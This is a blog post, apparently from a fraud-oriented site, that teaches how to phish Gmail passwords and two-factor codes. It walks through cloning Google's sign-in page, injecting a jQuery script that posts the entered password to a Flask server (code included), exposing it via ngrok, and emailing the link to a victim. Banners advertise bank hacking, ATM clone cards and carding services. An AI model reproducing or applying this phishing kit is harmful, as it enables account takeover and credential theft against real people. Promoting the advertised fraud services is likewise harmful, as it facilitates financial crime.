Nuggetcash
Security

HOW TO BYPASS GMAIL 2FA(TWO FACTOR AUTHENTICATION) 

Share

Initially we should know about some basics of phishing attack, It is the base techinque we use here to gain password of victim

REQUIREMENTS

1)KALI LINUX

2)SUBLIME TEXT EDITOR

3)NGROK

STEP 1:

Initially use your browser and search for google sign in

Read: How to shop online without OTP

STEP 2:

Type the mail id you wanna hack, after entering the mail id and click next

STEP 3:

After entering the mail id and right click the mouse and click inspect 

STEP 4:

after clicking inspect element ,go to inspector tab or element tab and right click and click the option called EDIT AS HTML,copy all html codes.

STEP 5:

paste it on sublime text editor and add some script at the end of the html tag

ill drop the code here:

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>
<script>
    $('button').click(function(e){
      e.preventDefault()
      auth=$('input[type=password]').val()
      $.post(
        "http://localhost:5000/auth",
        {"password":auth},
        function(data, status){
          window.location="http://localhost:5000/login"
        }
        );
      return false;
        })
</script>
</html>

save this file as login.html

NOTE: 

do it same for 2 factor authentication page 

STEP 6:

Banner 1

Get Cash App Transfer: Turn $250 to Six Figure Fortune

ORDER NOW
Banner 2

How To Hack Bank account? Order Wire Transfer Services

GET BANK TRANSFER
Banner 3

How To Hack ATM - Clone Card Trick For ATM Hacks

GET CLONE CARD
Banner 4

Shop Online Without OTP. No Carding Knowledge Required

BUY NON VBV CARD

next we need to write a python code that fetch deets from victim. And save it as app.py

ill give the code below

app.py

#!/usr/bin/env python3

from flask import Flask, render_template, send_file, make_response, request

app = Flask(__name__)

@app.route(“/auth”, methods=[“POST”])

def auth():

    print(request.form.to_dict())

    return “ok”

@app.route(“/”)

def index():

    response = make_response(send_file(“templates/login.html”))

    response.headers.add(“Access-Control-Allow-Origin”, “*”)

    return response

@app.route(“/login”)

def login():

    return send_file(“templates/2fa.html”)

if __name__ == “__main__”:

    app.run()

STEP 7:

open terminal in linux and type as i did and configure the ngrok

ngrok command

STEP 8:

And send the link in  mail to victim, BOOM…….!!!! youve got a password


Read: Apple Pay carding method. Updated versio

Leave a comment

Leave a Reply

Your email address will not be published. Required fields are marked *

Related Articles

Steal and cashout banks
Security

How Bank Logs data is stolen on websites? Secure your Account!

This tutorial is all about how Bank Logs are stolen online. According...

Anti-Money Laundering software
Make MoneySecurity

AML Software – What Is Anti-Money Laundering Software?

With many financial transactions taking place online, money laundering has become the...

Methods Hackers Use to Break Into Your Bank Account
Security

Secret Methods Hackers Use to Break Into Bank Accounts

Knowing how hackers break into bank accounts is useful. Here are ways...

Security

How to Be Anonymous on the Internet – 2026 Guide

Can you be anonymous on the internet at all? Do you know...

1